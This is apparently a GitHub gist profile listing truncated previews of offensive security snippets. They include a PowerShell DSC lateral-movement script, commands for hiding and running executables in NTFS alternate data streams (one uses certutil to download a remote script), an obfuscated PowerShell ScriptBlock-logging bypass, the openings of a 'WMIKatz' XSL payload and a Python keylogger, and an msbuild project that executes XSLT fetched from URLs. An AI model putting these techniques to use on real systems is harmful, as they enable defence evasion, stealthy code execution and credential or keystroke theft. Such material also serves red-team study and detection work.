Skip to content

Instantly share code, notes, and snippets.

View W00t3k's full-sized avatar

Adam M Toscher W00t3k

408 followers · 3 following
View GitHub Profile
@W00t3k
W00t3k / PowerShellDSCLateralMovement.ps1
Created June 29, 2018 11:32 — forked from mattifestation/PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/
<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
@W00t3k
W00t3k / Exe_ADS_Methods.txt
Created June 16, 2018 22:47 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
#Add content to ADS
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
@W00t3k
W00t3k / Exe_ADS_Methods.txt
Created June 16, 2018 22:47 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
#Add content to ADS
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
@W00t3k
W00t3k / ScriptBlockLogBypass.ps1
Created June 10, 2018 23:55 — forked from cobbr/ScriptBlockLogBypass.ps1
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
@W00t3k
W00t3k / gist:57e6e44d392800a0a01715ec9e2985a9
Created April 30, 2018 21:51
WMIKatz - Are you afraid
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0">
<!-- Copyright (c) Microsoft Corporation. All rights reserved. -->
<xsl:output method="text" omit-xml-declaration="yes" indent="no"/>
<xsl:strip-space elements="*" />
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
@W00t3k
W00t3k / readme.md
Created April 3, 2018 13:52 — forked from CodeBrauer/mount-image-qcow2-from-kvm-on-macos.md
Mount image (qcow2) from KVM on macOS - fastest way? / Convert qcow2 to access files (EXT4 partition)

If you haven't installed any FUSE yet:

brew tap homebrew/fuse
brew install Caskroom/cask/osxfuse
  1. brew install qemu ext4fuse
  2. qemu-img convert -p -O vmdk snapshot.qcow2 system.vmdk This will take some time...
  3. Download and register for a free licence of VMDK Mounter for Mac® OS X and install it.
  4. Reboot your macOS device.
@W00t3k
W00t3k / keylogger.py
Created March 31, 2018 13:19 — forked from xorrior/keylogger.py
Python on disk keylogger
import zipfile
import io
import sys
import os, imp
import base64
import threading
moduleRepo = {}
_meta_cache = {}
@W00t3k
W00t3k / all.txt
Created March 19, 2018 14:40 — forked from jhaddix/all.txt
all wordlists for every dns enumeration tool... ever.
@
*
0
00
0-0
000
0000
00000
000000
@W00t3k
W00t3k / SUID
Created March 18, 2018 03:17
SUID LU
Russell Cohen
Posts Projects
POSTS
March 13, 2018
Sudo Science: A brief tour of how Unix enables regular users to gain super (user) powers
Somehow I made it this far without actually understanding how sudo works. For years, I’ve just typed sudo, typed my password, and revelled in my new, magical, root super powers. The other day and I finally looked into it – to be honest, the mechanism is not at all what I expected. After going through the basics, we’ll walk through creating our own version of sudo.
How Sudo Works
sudo is just a regular old program that essentially does 3 things:
@W00t3k
W00t3k / xslt.proj
Created March 6, 2018 11:49
msbuild XSLT Execute From URL
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
<Target Name="Example">
<ItemGroup>
<XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" />
</ItemGroup>
<PropertyGroup>
<XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile>
</PropertyGroup>
<XslTransformation
OutputPaths="output.%(XmlFiles.FileName).html"